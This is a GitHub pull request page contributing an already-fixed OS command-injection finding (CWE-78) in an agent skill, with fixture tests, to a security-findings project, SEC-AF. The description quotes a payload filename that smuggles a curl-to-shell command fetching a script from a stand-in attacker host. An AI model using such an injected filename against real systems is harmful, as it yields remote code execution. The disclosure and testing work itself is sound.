Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78) by Amr-Saad · Pull Request #122 · Agent-Field/sec-af

Amr-Saad · 2026-06-07T21:51:40Z

What

A community-contributed, real-world finding in SEC-AF's verdict → trace → evidence format, added under exampl/:

exampl/zlibrary-to-notebooklm-command-injection.finding.json — structured finding (SEC-AF finding schema: cwe_id, evidence_level, proof.data_flow_evidence.steps, compliance, remediation…)
exampl/zlibrary-to-notebooklm-command-injection.md — readable advisory

Why it fits SEC-AF

It demonstrates exactly the class SEC-AF is built to prove: an OS command injection (CWE-78) in an AI-agent skill. The vulnerable project is an MIT-licensed agent "skill" (zlibrary-to-notebooklm) that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI.

Confirmed data flow: download.suggested_filename (attacker-controllable — the book uploader sets it) → download_path → title/file_path → f-strings → subprocess.run(..., shell=True) at 7 sinks (1 in convert_to_txt, 6 in upload_to_notebooklm). A book named '; curl https://evil.example/x.sh | sh; '.epub yields RCE when the skill processes it. The wrapping single-quotes are not a defence.

Responsible disclosure

The finding is already remediated — all seven sinks refactored to list-argv with shell=False, preserving behaviour (verified py_compile + zero shell=True). It is contributed as an example/fixture with the fix included, not a live 0-day.

Verdict

confirmed · severity high · evidence level 5 · CWE-78 · OWASP A03:2021.

…otebooklm) A community-contributed, real-world finding in SEC-AF's verdict/trace/evidence format, demonstrating the OS command-injection class (CWE-78) in AI-agent skills. The vulnerable project is an MIT-licensed agent "skill" that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI. `download.suggested_filename` (attacker-controllable) flows into f-strings run with subprocess.run(..., shell=True) at 7 sinks -> RCE via a crafted book filename. Already remediated (list-argv, shell=False); included as an example/fixture, not a live 0-day. Files: - exampl/zlibrary-to-notebooklm-command-injection.finding.json (SEC-AF finding schema) - exampl/zlibrary-to-notebooklm-command-injection.md (readable advisory)

CLAassistant · 2026-06-07T21:51:46Z

Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.
_{You have signed the CLA already but the status is still pending? Let us recheck it.}

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 361dda2943

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

…ifiedFinding The fixture is advertised as a SEC-AF finding, so consumers must be able to load it with sec_af.schemas.prove.VerifiedFinding. It previously omitted required fields and carried non-schema-shaped nested objects, so VerifiedFinding.model_validate(...) would reject it: - top-level: add required rationale, sarif_rule_id, sarif_security_severity (+ tags) - proof: add required exploit_hypothesis, verification_method, evidence_level; fold the non-schema exploit_scenario into exploit_hypothesis and map the payload/outcome onto Proof.exploit_payload / Proof.expected_outcome; data_flow_evidence already matched DataFlowEvidence - remediation: reshape to RemediationSuggestion (fix_description, patch_diff, confidence) from the prior non-schema summary/before/after/status/notes - compliance/location were already schema-valid Add tests/test_example_findings.py: parametrized over exampl/*.finding.json, asserts each loads via VerifiedFinding.model_validate and that proof/ remediation, when present, are fully-formed. Guards every example finding, current and future, against schema drift. Validated locally (pydantic 2.12.5; 2 passed). Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

chatgpt-codex-connector

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: c3c2041228

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

Open a pull request for review
Mark a draft as ready
Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

…engine The committed example understated the same finding the platform would emit. SEC-AF's own scoring (sec_af.scoring) floors CWE-78 to critical and recomputes exploitability_score = severity x evidence x reachability x chain, mirroring the result into sarif_security_severity (orchestrator.py:383-385). For this confirmed, level-5 RCE whose taint source is a remote attacker- controlled filename, the engine produces: critical (10.0) x EXPLOIT_SCENARIO_ VALIDATED (0.9) x externally_reachable (1.0) x no-chain (1.0) = 9.0. - severity: high -> critical - exploitability_score: 3.0 -> 9.0 - sarif_security_severity: 8.8 -> 9.0 (mirrors exploitability_score) - tags: + externally_reachable (the honest reachability bucket - taint enters from a remote, unauthenticated source; without it the engine's non-empty-tag fallback would score 4.5, still understating a confirmed RCE) - rationale + companion .md updated to match Strengthen tests/test_example_findings.py with test_example_finding_agrees_with_platform_scoring: re-runs the engine's floor + score pass over every fixture and asserts the stored values equal the recomputation, so an example can never again silently disagree with the platform. Verified locally: 3 passed (engine recomputes severity=critical, score=9.0). Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

santoshkumarradha · 2026-06-24T12:15:32Z

@Amr-Saad thanks for this. The finding and fixture tests look solid, and the focused pytest passes.

One small thing before this is ready: ruff wants the imports in tests/test_example_findings.py reordered, with sec_af.schemas.prove before sec_af.scoring. The CLA check is also still pending.

Place `sec_af.schemas.prove` before `sec_af.scoring` (alphabetical first-party ordering) per ruff isort. Addresses review feedback on PR Agent-Field#122. Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

chatgpt-codex-connector · 2026-06-24T12:19:30Z

You have reached your Codex usage limits for code reviews. You can see your limits in the Codex usage dashboard.
To continue using code reviews, add credits to your account and enable them for code reviews in your settings.

Amr-Saad · 2026-06-24T12:20:51Z

Thanks @santoshkumarradha — addressed:

ruff import order in tests/test_example_findings.py: moved from sec_af.schemas.prove import … above from sec_af.scoring import … (alphabetical first-party ordering). ruff check tests/test_example_findings.py → All checks passed, and the focused pytest tests/test_example_findings.py is green (3 passed). Pushed in 769100c.
CLA: still pending on my side — I'll get it signed so the check clears.

🤖 Addressed by Claude Code

santoshkumarradha · 2026-06-24T12:24:49Z

Thanks @santoshkumarradha — addressed:

ruff import order in tests/test_example_findings.py: moved from sec_af.schemas.prove import … above from sec_af.scoring import … (alphabetical first-party ordering). ruff check tests/test_example_findings.py → All checks passed, and the focused pytest tests/test_example_findings.py is green (3 passed). Pushed in 769100c.

CLA: still pending on my side — I'll get it signed so the check clears.

🤖 Addressed by Claude Code

Awesome, once done pr is gtg

chatgpt-codex-connector Bot reviewed Jun 7, 2026

View reviewed changes

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json

chatgpt-codex-connector Bot reviewed Jun 9, 2026

View reviewed changes

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json Outdated

test: fix ruff import order in test_example_findings.py

769100c

Place `sec_af.schemas.prove` before `sec_af.scoring` (alphabetical first-party ordering) per ruff isort. Addresses review feedback on PR Agent-Field#122. Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122
Amr-Saad wants to merge 4 commits into
Agent-Field:mainfrom
Amr-Saad:finding/zlibrary-to-notebooklm-command-injection

Amr-Saad commented Jun 7, 2026

Uh oh!

CLAassistant commented Jun 7, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Uh oh!

Uh oh!

chatgpt-codex-connector Bot left a comment

Uh oh!

Uh oh!

santoshkumarradha commented Jun 24, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 24, 2026

Uh oh!

Amr-Saad commented Jun 24, 2026

Uh oh!

santoshkumarradha commented Jun 24, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants

Uh oh!

Conversation

Amr-Saad commented Jun 7, 2026

What

Why it fits SEC-AF

Responsible disclosure

Verdict

Uh oh!

CLAassistant commented Jun 7, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

Uh oh!

santoshkumarradha commented Jun 24, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 24, 2026

Uh oh!

Amr-Saad commented Jun 24, 2026

Uh oh!

santoshkumarradha commented Jun 24, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants